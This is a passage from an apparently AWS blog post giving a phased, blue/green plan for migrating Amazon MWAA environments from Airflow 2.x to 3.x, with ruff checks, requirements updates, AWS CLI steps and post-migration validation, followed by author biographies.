Document all custom Amazon MWAA environment variables, Airflow connections, and environment configurations. Review AWS Identity and Access Management (IAM) resources, because your new environment’s execution role will need identical policies. IAM users or roles accessing the Airflow UI require the CreateWebLoginToken permission for the new environment.

Pipeline dependencies

Understanding pipeline dependencies is critical for a successful phased migration. Identify interdependencies through Datasets (now Assets), SubDAGs, TriggerDagRun operators, or external API interactions. Develop your migration plan around these dependencies so related DAGs can migrate at the same time.

Consider DAG scheduling frequency when planning migration waves. DAGs with longer intervals between runs provide larger migration windows and lower risk of duplicate execution compared with frequently running DAGs.

Testing strategy

Create your testing strategy by defining a systematic approach to identifying compatibility issues. Use the ruff linter with the AIR30 ruleset to automatically identify code requiring updates:

ruff check --preview --select AIR30 <path_to_your_dag_code>

Then, review and update your environment’s requirements.txt file to make sure package versions comply with the updated constraints file. Additionally, commonly used Operators previously included in the airflow-core package now reside in a separate package and need to be added to your requirements file.

Test your DAGs using the Amazon MWAA Docker images for Airflow 3.x. These images make it possible to create and test your requirements file, and confirm the Scheduler successfully parses your DAGs.

Migration strategy and best practices

A methodical migration approach minimizes risk while providing clear validation checkpoints. The recommended strategy employs a phased blue/green deployment model that provides reliable migrations and immediate rollback capabilities.

Phased migration approach

The following migration phases can assist you in defining your migration plan:

  • Phase 1: Discovery, assessment, and planning – In this phase, complete your environment inventory, dependency mapping, and breaking change analysis. With the gathered information, develop the detailed migration plan. This plan will include steps for updating code, updating your requirements file, creating a test environment, testing, creating the blue/green environment (discussed later in this post), and the migration steps. Planning must also include the training, monitoring strategy, rollback conditions, and the rollback plan.
  • Phase 2: Pilot migration – The pilot migration phase serves to validate your detailed migration plan in a controlled environment with a small range of impact. Focus the pilot on two or three non-critical DAGs with diverse characteristics, such as different schedules and dependencies. Migrate the selected DAGs using the migration plan defined in the previous phase. Use this phase to validate your plan and monitoring tools, and adjust both based on actual results. During the pilot, establish baseline migration metrics to help predict the performance of the full migration.
  • Phase 3: Wave-based production migration – After a successful pilot, you are ready to begin the full wave-based migration for the remaining DAGs. Group remaining DAGs into logical waves based on business criticality (least critical first), technical complexity, interdependencies (migrate dependent DAGs together), and scheduling frequency (less frequent DAGs provide larger migration windows). After you define the waves, work with stakeholders to develop the wave schedule. Include sufficient validation periods between waves to confirm the wave is successful before starting the next wave. This time also reduces the range of impact in the event of a migration issue, and provides sufficient time to perform a rollback.
  • Phase 4: Post-migration review and decommissioning – After all waves are complete, conduct a post-migration review to identify lessons learned, optimization opportunities, and any other unresolved items. This is also a good time to provide an approval on system stability. The final step is decommissioning the original Airflow 2.x environment. After stability is determined, based on business requirements and input, decommission the original (blue) environment.

Blue/green deployment strategy

Implement a blue/green deployment strategy for safe, reversible migration. With this strategy, you will have two Amazon MWAA environments operating during the migration and manage which DAGs operate in which environment.

The blue environment (current Airflow 2.x) maintains production workloads during transition. You can implement a freeze window for DAG changes before migration to avoid last-minute code conflicts. This environment serves as the immediate rollback environment if an issue is identified in the new (green) environment.

The green environment (new Airflow 3.x) receives migrated DAGs in controlled waves. It mirrors the networking, IAM roles, and security configurations from the blue environment. Configure this environment with the same options as the blue environment, and create identical monitoring mechanisms so both environments can be monitored simultaneously. To avoid duplicate DAG runs, make sure a DAG only runs in a single environment. This involves pausing the DAG in the blue environment before activating the DAG in the green environment.Maintain the blue environment in warm standby mode during the entire migration. Document specific rollback steps for each migration wave, and test your rollback procedure for at least one non-critical DAG. Additionally, define clear criteria for triggering the rollback (such as specific failure rates or SLA violations).

Step-by-step migration process

This section provides detailed steps for conducting the migration.

Pre-migration assessment and preparation

Before initiating the migration process, conduct a thorough assessment of your current environment and develop the migration plan:

  • Make sure your current Amazon MWAA environment is on version 2.10.x
  • Create a detailed inventory of your DAGs, custom operators, and plugins including their dependencies and versions
  • Review your current requirements.txt file to understand package requirements
  • Document all environment variables, connections, and configuration settings
  • Review the Apache Airflow 3.x release notes to understand breaking changes
  • Determine your migration success criteria, rollback conditions, and rollback plan
  • Identify a small number of DAGs suitable for the pilot migration
  • Develop a plan to train, or familiarize, Amazon MWAA users on Airflow 3

Compatibility checks

Identifying compatibility issues is critical to a successful migration. This step helps developers focus on specific code that is incompatible with Airflow 3.

Use the ruff linter with the AIR30 ruleset to automatically identify code requiring updates:

ruff check --preview --select AIR30 <path_to_your_dag_code>

Additionally, review your code for instances of direct metadatabase access.

DAG code updates

Based on your findings during compatibility testing, update the affected DAG code for Airflow 3.x. The ruff DAG check utility can automatically fix common changes. Use the following command to run the utility in update mode:

ruff check dag/ --select AIR301 --fix –preview

Common changes include:

  • Replace direct metadata database access with API calls:
    # Before (Airflow 2.x) - Direct DB access
    from airflow.settings import Session
    from airflow.models.taskInstance import TaskInstance
    session=Session()
    result=session.query(TaskInstance)
    
    For Apache Airflow v3.x, utilize  in the Amazon MWAA SDK.
    Update core construct imports with the new Airflow SDK namespace:
    # Before (Airflow 2.x)
    from airflow.decorators import dag, task
    
    # After (Airflow 3.x)
    from airflow.sdk import dag, task

  • Replace deprecated context variables with their modern equivalents:
    # Before (Airflow 2.x)
    def my_task(execution_date, **context):
        # Using execution_date
    
    # After (Airflow 3.x)
    def my_task(logical_date, **context):
        # Using logical_date

Next, evaluate the usage of the two scheduling-related default changes. catchup_by_default is now False, meaning missing DAG runs will no longer automatically backfill. If backfill is required, update the DAG definition with catchup=True. If your DAGs require backfill, you must consider the impact of this migration and backfilling. Because you’re migrating a DAG to a clean environment with no history, enabling backfilling will create DAG runs for all runs beginning with the specified start_date. Consider updating the start_date to avoid unnecessary runs.

create_cron_data_intervals is also now False. With this change, cron expressions are evaluated as a CronTriggerTimetable construct.

Finally, evaluate the usage of deprecated context variables for manually and Asset-triggered DAGs, then update your code with suitable replacements.

Updating requirements and testing

In addition to possible package version changes, several core Airflow operators previously included in the airflow-core package moved to the apache-airflow-providers-standard package. These changes must be incorporated into your requirements.txt file. Specifying, or pinning, package versions in your requirements file is a best practice and recommended for this migration.To update your requirements file, complete the following steps:

  1. Download and configure the Amazon MWAA Docker images. For more details, refer to the GitHub repo.
  2. Copy the current environment’s requirements.txt file to a new file.
  3. If needed, add the apache-airflow-providers-standard package to the new requirements file.
  4. Download the appropriate Airflow constraints file for your target Airflow version to your working director. A constraints file is available for each Airflow version and Python version combination. The URL takes the following form:
    https://raw.githubusercontent.com/apache/airflow/constraints-${AIRFLOW_VERSION}/constraints-${PYTHON_VERSION}.txt
  5. Create your versioned requirements file using your un-versioned file and the constraints file. For guidance on creating a requirements file, see Creating a requirements.txt file. Make sure there are no dependency conflicts before moving forward.
  6. Verify your requirements file using the Docker image. Run the following command inside the running container:
    ./run.sh test-requirements

    Address any installation errors by updating package versions.

As a best practice, we recommend packaging your packages into a ZIP file for deployment in Amazon MWAA. This makes sure the same exact packages are installed on all Airflow nodes. Refer to Installing Python dependencies using PyPi.org Requirements File Format for detailed information about packaging dependencies.

Creating a new Amazon MWAA 3.x environment

Because Amazon MWAA requires a migration approach for major version upgrades, you must create a new environment for your blue/green deployment. This post uses the AWS Command Line Interface (AWS CLI) as an example, you can also use infrastructure as code (IaC).

  1. Create a new S3 bucket using the same structure as the current S3 bucket.
  2. Upload the updated requirements file and any plugin packages to the new S3 bucket.
  3. Generate a template for your new environment configuration:
    aws mwaa create-environment --generate-cli-skeleton > new-mwaa3-env.json

  4. Modify the generated JSON file:
    1. Copy configurations from your existing environment.
    2. Update the environment name.
    3. Set the AirflowVersion parameter to the target 3.x version.
    4. Update the S3 bucket properties with the new S3 bucket name.
    5. Review and update other configuration parameters as needed.

    Configure the new environment with the same networking settings, security groups, and IAM roles as your existing environment. Refer to the Amazon MWAA User Guide for these configurations.

  5. Create your new environment:
    aws mwaa create-environment --cli-input-json file://new-mwaa3-env.json

Metadata migration

Your new environment requires the same variables, connections, roles, and pool configurations. Use this section as a guide for migrating this information. If you’re using AWS Secrets Manager as your secrets backend, you don’t need to migrate any connections. Depending your environment’s size, you can migrate this metadata using the Airflow UI or the Apache Airflow REST API.

  1. Update any custom pool information in the new environment using the Airflow UI.
  2. For environments using the metadatabase as a secrets backend, migrate all connections to the new environment.
  3. Migrate all variables to the new environment.
  4. Migrate any custom Airflow roles to the new environment.

Migration execution and validation

Plan and execute the transition from your old environment to the new one:

  1. Schedule the migration during a period of low workflow activity to minimize disruption.
  2. Implement a freeze window for DAG changes before and during the migration.
  3. Execute the migration in phases:
    1. Pause DAGs in the old environment. For a small number of DAGs, you can use the Airflow UI. For larger groups, consider using the REST API.
    2. Verify all running tasks have completed in the Airflow UI.
    3. Redirect DAG triggers and external integrations to the new environment.
    4. Copy the updated DAGs to the new environment’s S3 bucket.
    5. Enable DAGs in the new environment. For a small number of DAGs, you can use the Airflow UI. For larger groups, consider using the REST API.
  4. Monitor the new environment closely during the initial operation period:
    1. Watch for failed tasks or scheduling issues.
    2. Check for missing variables or connections.
    3. Verify external system integrations are functioning correctly.
    4. Monitor Amazon CloudWatch metrics to confirm the environment is performing as expected.

Post-migration validation

After the migration, thoroughly validate the new environment:

  • Verify that all DAGs are being scheduled correctly according to their defined schedules
  • Check that task history and logs are accessible and complete
  • Test critical workflows end-to-end to confirm they execute successfully
  • Validate connections to external systems are functioning properly
  • Monitor CloudWatch metrics for performance validation

Cleanup and documentation

When the migration is complete and the new environment is stable, complete the following steps:

  1. Document the changes made during the migration process.
  2. Update runbooks and operational procedures to reflect the new environment.
  3. After a sufficient stability period, defined by stakeholders, decommission the old environment:
    aws mwaa delete-environment --name old-mwaa2-env

  4. Archive backup data according to your organization’s retention policies.

Conclusion

The journey from Airflow 2.x to 3.x on Amazon MWAA is an opportunity to embrace next-generation workflow orchestration capabilities while maintaining the reliability of your workflow operations. By following these best practices and maintaining a methodical approach, you can successfully navigate this transition while minimizing risks and disruptions to your business operations.

A successful migration requires thorough preparation, systematic testing, and maintaining clear documentation throughout the process. Although the migration approach requires more initial effort, it provides the safety and control needed for such a significant upgrade.


About the authors

Anurag Srivastava

Anurag Srivastava

Anurag works as a Senior Technical Account Manager at AWS, specializing in Amazon MWAA. He’s passionate about helping customers build scalable data pipelines and workflow automation solutions on AWS.

Kamen Sharlandjiev

Kamen Sharlandjiev

Kamen is a Sr. Big Data and ETL Solutions Architect, Amazon MWAA and AWS Glue ETL expert. He’s on a mission to make life easier for customers who are facing complex data integration and orchestration challenges. His secret weapon? Fully managed AWS services that can get the job done with minimal effort. Follow Kamen on LinkedIn to keep up to date with the latest Amazon MWAA and AWS Glue features and news!

Ankit Sahu

Ankit Sahu

Ankit brings over 18 years of expertise in building innovative digital products and services. His diverse experience spans product strategy, go-to-market execution, and digital transformation initiatives. Currently, Ankit serves as Senior Product Manager at Amazon Web Services (AWS), where he leads the Amazon MWAA service.

Jeetendra Vaidya

Jeetendra Vaidya

Jeetendra is a Senior Solutions Architect at AWS, bringing his expertise to the realms of AI/ML, serverless, and data analytics domains. He is passionate about assisting customers in architecting secure, scalable, reliable, and cost-effective solutions.

Mike Ellis

Mike Ellis

Mike is a Senior Technical Account Manager at AWS and an Amazon MWAA specialist. In addition to assisting customers with Amazon MWAA, he contributes to the Airflow open source project.

Venu Thangalapally

Venu Thangalapally

Venu is a Senior Solutions Architect at AWS, based in Chicago, with deep expertise in cloud architecture, data and analytics, containers, and application modernization. He partners with financial service industry customers to translate business goals into secure, scalable, and compliant cloud solutions that deliver measurable value. Venu is passionate about using technology to drive innovation and operational excellence. Outside of work, he enjoys spending time with his family, reading, and taking long walks.